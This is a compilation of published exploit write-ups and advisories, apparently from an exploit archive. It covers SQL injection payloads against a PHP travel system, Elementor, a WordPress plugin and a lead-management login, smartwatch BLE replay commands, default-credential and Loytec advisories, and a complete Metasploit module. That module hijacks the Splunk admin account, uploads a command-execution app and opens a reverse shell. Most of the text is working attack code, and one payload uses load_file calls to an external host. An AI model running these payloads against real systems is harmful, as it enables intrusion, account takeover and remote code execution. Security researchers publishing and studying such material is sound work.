<pre><code>## Title: travel-1.0-by-oretnom23 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 11/12/2023<br />## Vendor: https://github.com/oretnom23<br />## Software: https://github.com/oretnom23/php-travel-agency-system<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The search parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'<br />was submitted in the search parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed.<br /><br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```MySQL<br />---<br />Parameter: search (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: search=951531'+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''<br />RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(select<br />load_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+''<br />ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)<br /> Payload: search=951531'+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''<br />OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND<br />'fGlq'='fGlq&searc=&sumbit=Submit<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 28 columns<br /> Payload: search=951531'+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit<br />---<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html)<br /><br />## Time spent:<br />00:17:00<br /><br /></code></pre>
<pre><code><br />#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi<br />#References<br />#CVE : CVE-2023-0329<br />#E1.Coders<br /> <br />Open Burp Suite.<br />In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.<br />Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.<br />Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.<br />On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":<br /> <br />code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#<br />Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.<br />Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".<br />The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.<br />Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s<br /> <br />References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/<br /> <br /> <br /> <br /> <br />Exploit Python :<br />The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:<br /> <br />This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.<br />Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct<br /> <br />import requests<br /> <br /># Set the target URL and SQLi payload<br />url = "http://localhost:8080/wp-admin/admin-ajax.php"<br />data = {<br /> "action": "elementor_ajax_save_builder",<br /> "editor_post_id": "1",<br /> "post_id": "1",<br /> "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"<br />}<br /> <br /># Send the request to the target URL<br />response = requests.post(url, data=data)<br /> <br /># Check if the response indicates a successful SQL injection<br />if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:<br /> print("SQL Injection successful!")<br />else:<br /> print("SQL Injection failed.")<br /></code></pre>
<pre><code>Advisory ID: Ph0s-2023-004<br />Product: EnBw - SENEC legacy storage box: V1-V3<br />Manufacturer: SENEC - a part of EnBw<br />Affected Version(s): Firmware: all (as of 2023-06-19)<br />Tested Version(s): current<br />Vulnerability Type: CWE-1392: Use of Default Credentials<br /><br /><br />Risk Level: <br /><br />CVSS v3.1 Vector:<br />AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)<br /><br />Manufacturer Risk Level Rating:<br />AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C<br />Overall CVSS Score: 8.6<br /><br />Solution Status: Fixed<br />Manufacturer Notification: 2023-06-05<br />Public Disclosure: 2023-11-01<br />CVE Reference: CVE-2023-39170<br />Author of Advisory: Ph0s[4], R0ckE7<br /><br />********************************************************************************<br /><br />Overview:<br />Foreword: <br /><br />This vulnerability was reported to the enbw-cert. we would like to<br />thank enbw-cert for taking care of the vulns and patch the systems.<br />we decided to publish when most of the reported vulns are patched<br />to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. <br /><br /><br /><br />About Senec:<br />We are SENEC<br /><br />We have been the EnBW energy independence experts since 2018 – but we have<br />put our heart and soul into guiding customers on the route to independence<br />since SENEC was founded in 2009. Our passion lies in actively promoting the<br />energy transition with innovative ideas and pioneering products. And, <br /><br />because we don’t do things by halves, our unwavering ambition is to create<br />integrated solutions that enable you to enjoy the highest possible degree<br />of independence and sustainability through self-generation of solar <br /><br />electricity.<br /><br />About SENEC Home:<br /><br />SENEC.Home: The smart electricity storage device for your home<br /><br />SENEC.Home is the heart of the your sustainable, affordable supply of solar<br />electricity. The smart battery storage device stores excess electricity <br /><br />generated by your PV system so that you can use it when you need it – such as<br />when your household’s energy consumption rises in the evening, or on rainy days<br />when your PV system generates less power.<br /><br />********************************************************************************<br /><br /><br />Vulnerability Details:<br /><br />The credentials for the senec inverters are known in public.<br /><br /><br /><br />********************************************************************************<br /><br />Proof of Concept (PoC):<br /><br />The attack consists of the following steps:<br /><br />1. use google to optain them, eg:<br />https://www.photovoltaikforum.com/thread/206930-senec-v3-hybrid-zugangsdaten/<br /><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br />Patched by Manufacturer<br />(Rolled out until September 11, 2023)<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-06-01: Vulnerability discovered<br />2023-06-05: Vulnerability reported to manufacturer<br />2023-09-11: Patch rollout by manufacturer to affected devices<br />2023-11-01: Public disclosure of vulnerability<br /><br /><br />************************************************************************<br /><br />Researcher:<br />Ph0s[4], R0ckE7<br /><br />************************************************************************<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. <br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 4.0<br />URL: https://creativecommons.org/licenses/by/4.0/deed.en<br /><br /></code></pre>
<pre><code># Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)<br /># Date: 13-Nov-2023<br /># Exploit Author: Alok kumar (alokkumar0200@gmail.com), Cyberpwn Technologies Pvt. Ltd.<br /># Vendor Homepage: https://www.maximawatches.com<br /># Product Link: https://www.maximawatches.com/products/max-pro-power<br /># Firmware Version: v1.0 486A<br /># Tested on: Maxima Max Pro Power<br /># CVE : CVE-2023-46916<br /><br /># It was observed that an attacker can send crafted HEX values to “0x0012” GATT Charactristic handle on the watch to perform unauthorized actions like change Time display format, update Time, update notifications.<br /># And since, there is no integrity check for data received by the watch, an attacker can sniff the same value on smartwatch A, which later can be sent to smartwatch B leading unauthorized actions<br /><br /><br /># Scan for bluetooth LE devices nearby using any capable scanner, bluetoothctl is used in this “sudo bluetoothctl scan le”<br /><br /># “sudo gattool -I” Starts gattool in interactive mode.<br /><br /># “connect <MAC_OF_DEVICE_FROM_STEP_1>” Connects to the specified BLE device.<br /><br /># “char-desc” Lists all handles for the device.<br /><br /># Run “mtu 247” in Gatttool after connection to set MTU for active connection.<br /><br /># Run “char-read-hnd 0x0054” in Gatttool. Trust And Authorize the device on attacker's machine when prompted.<br /><br /># "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.<br /><br /># "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.<br /><br /># "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor<br /><br /># "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.<br /><br /># "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.<br /></code></pre>
<pre><code># Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection<br /># Date: 12-11-2023<br /># Exploit Author: Arvandy<br /># Software Link: https://wordpress.org/plugins/contact-form-to-any-api/<br /># Vendor Homepage: https://www.itpathsolutions.com/<br /># Version: 1.1.2 <br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-32741<br /><br /># Product Description<br />Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.<br /><br /># Vulnerability overview<br />The Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.<br /><br /># Proof of Concept<br />Affected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=<br />Affected Parameter: form_id<br />payload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -<br /><br /># Recommendation<br />Upgrade to version 1.1.3<br /></code></pre>
<pre><code>## Title: penglead-2.0 SQLi-Bypass Authentication<br />## Author: nu11secur1ty<br />## Date: 11/10/2023<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The id parameter is vulnerable to SQLi - Bypass Authentication attacks.<br />The attacker can easily get access to the admin account of the system<br />then he can do very malicious stuff etc.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Exploit:<br />```MySQL<br />POST /penglead/login.php HTTP/1.1<br />Host: 192.168.100.45<br />Cookie: PHPSESSID=3qa8cq3da9t9rvr621vov0shsh<br />Content-Length: 88<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://192.168.100.45<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://192.168.100.45/penglead/login.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br />Connection: close<br /><br />username=nu11secur1ty%27+or+1%3D1%23&password=FSFFGDDGDGFDG&g-recaptcha-response=&login=<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/penglead-2.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/11/penglead-20-sqli-bypass-authentication.html)<br /><br />## Time spent:<br />00:05:00<br /><br /><br /></code></pre>
<pre><code><br />[+] CVE : CVE-2023-46380, CVE-2023-46381, CVE-2023-46382 <br />[+] Title : Multiple vulnerabilities in Loytec LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, L-VIS Touch Panels <br />[+] Vendor : LOYTEC electronics GmbH<br />[+] Affected Product(s) : LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2, LIOB-586 firmware 6.2.3<br />[+] Affected Components : LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, L-VIS Touch Panels <br />[+] Discovery Date : 01-Sep-2021<br />[+] Publication date : 03-Nov-2023<br />[+] Discovered by : Chizuru Toyama of TXOne networks<br /><br /><br />[Vulnerability Description]<br /><br /> CVE-2023-46380 : Insecure Permissions<br /> Password change request on the web interface on LOYTEC devices is sent<br /> in clear text over HTTP, and this allows information theft and account <br /> takeover via network sniffing.<br /><br /> CVE-2023-46381 : Improper Access Control<br /> Authentication is missing on the web user interface for the preinstalled <br /> version of LWEB-802. If there is a project on a device, an unauthenticated <br /> user could create a new project on a web and access/control a graphical <br /> interface. An unauthenticated user also could edit or delete a current <br /> web project, change settings and delete system logs etc...<br /> http://<IP>:<port>/lweb802_pre/<br /><br /> CVE-2023-46382 : Insecure Permissions<br /> The web user interface on Loytec devices requires login credentials for <br /> critical information (Data, Commission, Config, etc...); however, username <br /> and password information is sent in clear text over HTTP. If anyone sniff <br /> network traffic, they could easily steal credentials.<br /><br /><br />[Timeline]<br /><br /> 01-Sep-2021 : Vulnerabilities discovered<br /> 13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response)<br /> 07-Oct-2022 : ICS CERT reported to vendor (no response)<br /> 03-Nov-2023 : Public disclosure<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> include Msf::Exploit::Remote::HttpClient<br /><br /> attr_accessor :cookie<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Splunk "edit_user" Capability Privilege Escalation',<br /> 'Description' => %q{<br /> A low-privileged user who holds a role that has the "edit_user" capability assigned to it<br /> can escalate their privileges to that of the admin user by providing a specially crafted web request.<br /> This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf<br /> configuration file, which prevents this scenario from happening.<br /><br /> This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.<br /> },<br /> 'Author' => [<br /> 'Mr Hack (try_to_hack) Santiago Lopez', # discovery<br /> 'Heyder Andrade', # metasploit module<br /> 'Redway Security <redwaysecurity.com>' # Writeup and PoC<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'CVE', '2023-32707' ],<br /> [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory<br /> [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup<br /> [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC<br /> ],<br /> 'Payload' => {<br /> 'Space' => 1024,<br /> 'DisableNops' => true<br /> },<br /> 'Platform' => %w[linux unix win osx],<br /> 'Targets' => [<br /> [<br /> 'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => %w[linux unix],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_python',<br /> # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'<br /> 'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'<br /> }<br /> }<br /> ],<br /> [<br /> 'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8000,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS, # requests are logged in the _audit index<br /> # ARTIFACTS_ON_DISK # app is removed in the cleanup method<br /> ]<br /> },<br /> 'DisclosureDate' => '2023-06-01'<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),<br /> OptString.new('PASSWORD', [true, 'The password for the specified username']),<br /> OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),<br /> OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),<br /> OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')])<br /> ]<br /> )<br /> # That depends on finding a strategy to distinguish commands that return output and commands that don't<br /> # register_advanced_options(<br /> # [<br /> # OptBool.new('ReturnOutput', [ true, 'Display command output', false ])<br /> # ]<br /> # )<br /> end<br /><br /> def check<br /> splunk_login(datastore['USERNAME'], datastore['PASSWORD'])<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),<br /> 'method' => 'GET',<br /> 'cookie' => cookie,<br /> 'vars_get' => {<br /> 'output_mode' => 'json'<br /> }<br /> })<br /><br /> return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200<br /><br /> body = res.get_json_document<br /> version = Rex::Version.new(body['generator']['version'])<br /><br /> return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (<br /> (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) ||<br /> (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) ||<br /> (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14'))<br /> )<br /><br /> print_status("Detected Splunk version #{version} which is vulnerable")<br /> capabilities = body['entry'].first['content']['capabilities']<br /><br /> return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user'<br /><br /> report_vuln(<br /> host: rhost,<br /> name: name,<br /> refs: references,<br /> info: [version]<br /> )<br /><br /> CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability")<br /> end<br /><br /> def app_name<br /> datastore['APP_NAME']<br /> end<br /><br /> # The cleanup method is removing the app before the session is closed and it is broking the session.<br /> #<br /> def cleanup<br /> return unless session_created?<br /><br /> super<br /> # Destroy job<br /> vprint_status("Cleaning up: destroying job #{@job_id}")<br /> send_request_cgi({<br /> 'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),<br /> 'method' => 'DELETE',<br /> 'cookie' => cookie<br /> })<br /> # Remove app<br /> vprint_status("Cleaning up: removing app #{app_name}")<br /> execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'vars_post' => {<br /> 'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']<br /> }<br /> })<br /> end<br /><br /> def exploit<br /> splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])<br /> splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])<br /><br /> splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE'])<br /><br /> @job_id = execute_command(payload.encoded, { app_name: app_name })<br /> # TODO: distinguish commands that return output and commands that don't<br /> # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output' && !datastore['ReturnOutput']<br /> # if datastore['ReturnOutput']<br /> # print_status('Waiting for command output')<br /> # print_line(splunk_fetch_job_output)<br /> # end<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> res = send_request_cgi({<br /> 'uri' => '/en-US/api/search/jobs',<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'headers' =><br /> {<br /> 'X-Requested-With' => 'XMLHttpRequest',<br /> 'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000']<br /> },<br /> 'vars_post' =><br /> {<br /> 'auto_cancel' => '62',<br /> 'status_buckets' => '300',<br /> 'output_mode' => 'json',<br /> 'search' => "| #{app_name} #{Rex::Text.encode_base64(cmd)}",<br /> 'earliest_time' => '-1@h',<br /> 'latest_time' => 'now',<br /> 'ui_dispatch_app' => (opts[:app_name]).to_s<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless res&.code == 200<br /><br /> body = res.get_json_document<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to get JOB ID of the command') unless body['data']<br /><br /> body['data']<br /> end<br /><br /> def splunk_helper_extract_token(uri)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, uri),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> })<br /><br /> fail_with(Failure::Unreachable, 'Unable to get token') unless res&.code == 200<br /><br /> "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies<br /> end<br /><br /> def splunk_login(username, password)<br /> # gets cval and splunkweb_uid cookies<br /> self.cookie = splunk_helper_extract_token('/en-US/account/login')<br /><br /> # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/en-US/account/login'),<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'vars_post' =><br /> {<br /> 'username' => username,<br /> 'password' => password,<br /> 'cval' => cookies_hash['cval']<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200<br /><br /> cookie << " #{res.get_cookies}"<br /> end<br /><br /> def splunk_change_password(username, password)<br /> # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set<br /> do_login(username, password) unless cookie<br /><br /> print_status("Changing '#{username}' password to #{password}")<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri('/en-US/splunkd/__raw/services/authentication/users/', username),<br /> 'method' => 'POST',<br /> 'headers' => {<br /> 'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'],<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> },<br /> 'cookie' => cookie,<br /> 'vars_post' => {<br /> 'output_mode' => 'json',<br /> 'password' => password,<br /> 'force-change-pass' => 0,<br /> 'locked-out' => 0<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200<br /><br /> print_good("Password of the user '#{username}' has been changed to #{password}")<br /><br /> body = res.get_json_document<br /> capabilities = body['entry'].first['content']['capabilities']<br /><br /> fail_with(Failure::BadConfig, "The user '#{username}' does not have 'install_app' capability. You may consider to target other user") unless capabilities.include? 'install_apps'<br /> end<br /><br /> def splunk_upload_app(app_name, _file_name)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/en-US/manager/appinstall/_upload'),<br /> 'method' => 'GET',<br /> 'cookie' => cookie<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to get form state') unless res&.code == 200<br /><br /> html = res.get_html_document<br /><br /> print_status("Uploading file #{app_name}")<br /><br /> data = Rex::MIME::Message.new<br /> # fill the hidden fields from the form: state and splunk_form_key<br /> html.at('[id="installform"]').elements.each do |form|<br /> next unless form.attributes['value']<br /><br /> data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"")<br /> end<br /> data.add_part('1', nil, nil, 'form-data; name="force"')<br /> data.add_part(splunk_app, 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"")<br /> post_data = data.to_s<br /><br /> res = send_request_cgi({<br /> 'uri' => '/en-US/manager/appinstall/_upload',<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'ctype' => "multipart/form-data; boundary=#{data.bound}",<br /> 'data' => post_data<br /> })<br /><br /> fail_with(Failure::Unknown, 'Error uploading App') unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))<br /><br /> print_good("#{app_name} successfully uploaded")<br /> end<br /><br /> # def splunk_fetch_job_output<br /> # res = send_request_cgi({<br /> # 'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),<br /> # 'method' => 'GET',<br /> # 'keep_cookies' => true,<br /> # 'cookie' => cookie,<br /> # 'vars_get' => {<br /> # 'output_mode' => 'json'<br /> # }<br /> # })<br /><br /> # fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200<br /><br /> # body = res.get_json_document<br /><br /> # fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?<br /><br /> # Rex::Text.decode_base64(body['results'].first['result'])<br /> # end<br /><br /> def splunk_app<br /> # metadata folder<br /> metadata = <<~EOF<br /> [commands]<br /> export = system<br /> EOF<br /><br /> # default folder<br /> commands_conf = <<~EOF<br /> [#{app_name}]<br /> type = python<br /> filename = #{app_name}.py<br /> local = false<br /> enableheader = false<br /> streaming = false<br /> perf_warn_limit = 0<br /> EOF<br /><br /> app_conf = <<~EOF<br /> [launcher]<br /> author=#{Faker::Name.name}<br /> description=#{Faker::Lorem.sentence}<br /> version=#{Faker::App.version}<br /><br /> [ui]<br /> is_visible = false<br /> EOF<br /><br /> # bin folder<br /> msf_exec_py = <<~EOF<br /> import sys, base64, subprocess<br /> import splunk.Intersplunk<br /><br /> header = ['result']<br /> results = []<br /><br /> try:<br /> proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)<br /> output = proc.stdout.read().decode('utf-8')<br /> results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})<br /> except Exception as e:<br /> error_msg = f'Error : {str(e)} '<br /> results = splunk.Intersplunk.generateErrorResults(error_msg)<br /><br /> splunk.Intersplunk.outputResults(results, fields=header)<br /> EOF<br /><br /> tarfile = StringIO.new<br /> Rex::Tar::Writer.new tarfile do |tar|<br /> tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io|<br /> io.write metadata<br /> end<br /> tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io|<br /> io.write commands_conf<br /> end<br /> tar.add_file("#{app_name}/default/app.conf", 0o644) do |io|<br /> io.write app_conf<br /> end<br /> tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io|<br /> io.write msf_exec_py<br /> end<br /> end<br /> tarfile.rewind<br /> tarfile.close<br /><br /> Rex::Text.gzip(tarfile.string)<br /> end<br /><br /> def cookies_hash<br /> cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }<br /> end<br /><br />end<br /></code></pre>
<pre><code>--------------------------------------------------------------<br />phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability<br />--------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.phpfox.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.8.13 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />User input passed through the "url" request parameter to the <br />/core/redirect route is not properly sanitized before being used in a <br />call to the unserialize() PHP function. This can be exploited by remote, <br />unauthenticated attackers to inject arbitrary PHP objects into the <br />application scope, allowing them to perform a variety of attacks, such <br />as executing arbitrary PHP code.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-46817.php<br /><br />(Packet Storm note: POC included at bottom)<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 4.8.14 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[05/10/2023] - Vendor contacted through https://clients.phpfox.com<br />[05/10/2023] - Vendor response stating "we currently do not have such <br />security requirements"<br />[06/10/2023] - CVE identifier requested<br 